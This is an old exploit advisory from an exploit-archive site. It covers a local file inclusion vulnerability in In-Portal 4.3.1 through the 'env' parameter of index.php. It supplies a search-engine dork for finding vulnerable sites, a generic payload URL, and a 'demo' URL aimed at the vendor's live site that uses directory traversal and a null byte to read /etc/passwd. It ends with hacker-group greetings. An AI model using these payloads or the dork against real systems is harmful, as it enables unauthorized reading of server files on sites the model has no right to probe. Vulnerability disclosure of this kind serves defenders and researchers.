[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : In-Portal 4.3.1 (index.php env) Local File Inclusion Vulnerability
# Published : 2009-08-04
# Author : Angela Chang
# Previous Title : Perl$hop e-commerce Script Trust Boundary Input Parameter Injection
# Next Title : PHP Email Manager (remove.php ID) SQL Injection Vulnerability


@ ===================================================================================@
/                      Title    : Local File Inclusion Vulnerability                   
                       Software : In-Portal 4.3.1
                       Vendor   : http://www.in-portal.net/                    
[-]                                                                                    [-]
                       Date     : 01 August 2009 (Indonesia)
                       Author   : Angela Chang
                       Contact  : mizz_4ng3l@yahoo.com
                                                                                      /
 @ ===================================================================================@
                                                                                                                                                                                             
 [-] Dork                                                                                                                                                                                    
 
     "Powered by In-portal"
 
 [-] Exploit                                                                                                                                                                                
 
     http://[site]/[path]/index.php?env=-/[LFI]%00
 
 [-] Demo                                                                                                                                                                                    
 
     http://www.in-portal.net/demo/index.php?env=-/../../../../../../../../../../../../../../../etc/passwd%00
                                                                                                                                                                                                  
{o} ==================================================================================={o}
 
                                                 Greetz   :   -:-  SkyCreW  -:-
 
     Nyubi (Solpot) , Vrs-hCk , OoN_BoY , NoGe , Paman , zxvf ,   home_edition2001   ,   str0ke
 
 
{o}===================================================================================={o}
 
 
{o}===================================================================================={o} 

# www.Syue.com [2009-08-04]